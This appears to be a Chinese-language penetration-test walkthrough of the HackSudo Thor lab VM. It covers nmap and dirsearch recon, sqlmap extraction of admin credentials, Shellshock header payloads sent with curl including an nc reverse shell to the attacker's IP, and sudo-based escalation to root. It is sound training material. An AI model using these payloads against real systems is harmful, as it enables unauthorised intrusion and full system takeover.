nmap -sP 192.168.138.0/24
主机:192.168.138.68
靶机:192.168.138.251
nmap -p- 192.168.138.251
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http
nmap -A 192.168.138.251
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: E8:6F:38:4E:68:3F (Chongqing Fugui Electronics)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
dirsearch -u http://192.168.138.251/
[02:17:22] 302 - 7KB - /admin_home.php -> home.php
[02:17:23] 200 - 489B - /admin_login.php
[02:17:36] 403 - 280B - /cgi-bin/
[02:17:39] 200 - 1KB - /contact.php
[02:17:49] 301 - 318B - /fonts -> http://192.168.138.251/fonts/
[02:17:52] 200 - 278B - /header.php
[02:17:52] 200 - 2KB - /home.php
[02:17:53] 301 - 319B - /images -> http://192.168.138.251/images/
[02:17:53] 200 - 668B - /images/
[02:18:05] 200 - 3KB - /news.php
[02:18:15] 200 - 4KB - /README.md
[02:18:20] 403 - 280B - /server-status
[02:18:20] 403 - 280B - /server-status/
#访问README.md,获得后台管理员权限
However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
http://192.168.138.251/admin_login.php
#发现搜索框存在SQL注入漏洞,使用sqlmap可以延时注入,获得一堆无用的信息
sqlmap -r 1.txt -p search --batch -D hacksudo -T customer --columns
available databases [4]:
[*] hacksudo
[*] information_schema
[*] mysql
[*] performance_schema
Database: hacksudo
[12 tables]
+--------------+
| admin |
| beneficiary1 |
| beneficiary2 |
| beneficiary3 |
| beneficiary4 |
| customer |
| news |
| news_body |
| passbook1 |
| passbook2 |
| passbook3 |
| passbook4 |
+--------------+
Database: hacksudo
Table: admin
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| id | int(11) |
| pwd | char(25) |
| uname | char(25) |
+--------+----------+
+-------+-------------+
| uname | pwd |
+-------+-------------+
| admin | password123 |
+-------+-------------+
#发现news.php源码存在黑客入侵cgi-bin记录,获得backup.cgi信息
dirsearch -u http://192.168.138.251/cgi-bin
#使用nmap扫描破壳漏洞具体信息
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.138.251
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.38 (Debian) Server at 192.168.138.251 Port 80</address>
| </body></html>
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ http://seclists.org/oss-sec/2014/q3/685
|_http-server-header: Apache/2.4.38 (Debian)
#请求该漏洞,执行shell命令
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.138.251/cgi-bin/backup.cgi
#查看是否有nc工具
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'which nc'" \http://192.168.138.251/cgi-bin/backup.cgi
#进行反弹shell操作
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.138.68 6666'" \http://192.168.138.251/cgi-bin/backup.cgi
#获取shell,切换交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
#查看shell权限,发现可以免密以用户thor执行/home/thor/./hammer.sh脚本
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh
#执行切换thor用户
sudo -u thor /home/thor/./hammer.sh
#查看第一个flag
cat user.txt
user owned
#再次查看发现可以免密执行service和cat命令,构建提权命令
sudo -l
Matching Defaults entries for thor on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thor may run the following commands on HackSudoThor:
(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
#提权成功
sudo service ../../bin/bash
#获取最后flag
cat proof.txt
rooted
████████
▒▒▒▒▒▒██▒▒▒▒
▓▓░░▒▒▓▓ ░░▒▒██
██░░▒▒▓▓▒▒▓▓ ░░▒▒██
██░░▒▒▓▓▒▒▒▒▒▒▓▓ ░░▒▒██
██░░▒▒▓▓▒▒▒▒░░░░▒▒▓▓ ░░▒▒▓▓ ██████
▓▓░░▒▒▓▓▒▒▒▒░░░░░░░░▒▒▓▓ ░░▒▒▓▓ ▓▓░░▓▓▓▓▓▓
▓▓▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░░▓▓ ░░▒▒▓▓░░░░░░▓▓██
▓▓▓▓▓▓▒▒░░ ▒▒░░░░░░ ░░▒▒▓▓ ░░▒▒▓▓░░▒▒▒▒██
▓▓▓▓▓▓▓▓▒▒░░ ▒▒░░░░░░ ░░▒▒▒▒ ░░▒▒▓▓▒▒▓▓░░
██▓▓▓▓▓▓▒▒▒▒ ▒▒░░░░░░ ░░▒▒▒▒ ░░▒▒▓▓
██▓▓▓▓▓▓▒▒▒▒ ▒▒░░░░░░ ░░▒▒▒▒ ░░▒▒██
██▓▓▓▓▓▓▒▒▒▒ ▒▒░░░░░░ ░░▒▒▓▓ ░░▒▒██
▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░▒▒▓▓ ░░▒▒██
▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░▒▒▓▓ ░░▒▒██
▓▓▓▓▓▓▓▓▒▒▒▒ ▒▒░░░░░░ ░░▒▒▓▓ ░░▒▒██
▓▓▓▓▓▓▓▓▒▒▒▒ ▒▒░░░░░░ ░░▒▒▓▓ ░░▒▒██
▓▓░░▓▓▓▓▓▓▓▓▒▒▒▒ ▒▒░░░░░░░░░░▒▒▓▓ ▓▓▓▓██
▓▓░░░░░░▓▓▓▓▓▓▓▓▒▒░░ ▒▒░░░░░░ ▒▒▒▒▓▓ ████
▓▓░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▒▒░░ ▒▒░░ ▒▒▒▒▓▓▓▓▓▓░░██
██░░░░░░▒▒▒▒██ ██▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓██░░▒▒██
██ ░░░░▒▒▒▒██ ██▓▓▓▓▓▓▒▒░░ ▒▒▓▓▓▓██░░▒▒██
░░ ░░ ██░░░░░░▒▒▒▒██ ██▓▓▓▓▓▓▒▒▒▒▓▓▓▓██░░▒▒██
░░ ░░ ░░ ██ ░░░░▒▒▒▒▓▓ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░▒▒██
░░ ░░ ██ ░░░░▒▒▒▒▓▓ ░░▓▓▓▓▓▓▓▓▓▓░░▒▒██
░░ ██ ░░░░▒▒▒▒▓▓ ░░▓▓▓▓▓▓░░▒▒██
██ ░░░░▒▒▒▒██ ░░██▓▓██▓▓
▓▓ ░░░░▒▒▒▒██
██ ░░░░▒▒▒▒██
▓▓ ░░░░▒▒▒▒██
▓▓ ░░░░▒▒▒▒██
░░▓▓░░░░░░▒▒▒▒██
░░▓▓░░░░░░▒▒▒▒▓▓
░░▒▒░░░░░░▒▒▒▒▓▓
▒▒░░░░░░▒▒▒▒▓▓
██░░░░░░▒▒▒▒▓▓
██ ░░░░▒▒▒▒▓▓
██ ░░░░▒▒▒▒▓▓
██ ░░░░▒▒▒▒▓▓
▓▓ ░░░░▒▒▒▒▓▓
██ ░░░░▒▒▒▒▒▒
▓▓░░░░░░▒▒▒▒██
████▓▓▓▓░░▒▒▒▒██
██▒▒ ▒▒▓▓▓▓▒▒██
▓▓▒▒ ▒▒▒▒▓▓██
▓▓▒▒▒▒▒▒▓▓██
██▓▓▓▓▓▓▓▓██
░░▓▓▓▓▓▓▓▓░░
#通关
cat root.txt
rooted
HACKSUDO THOR靶机渗透记录
于 2023-12-21 17:30:30 首次发布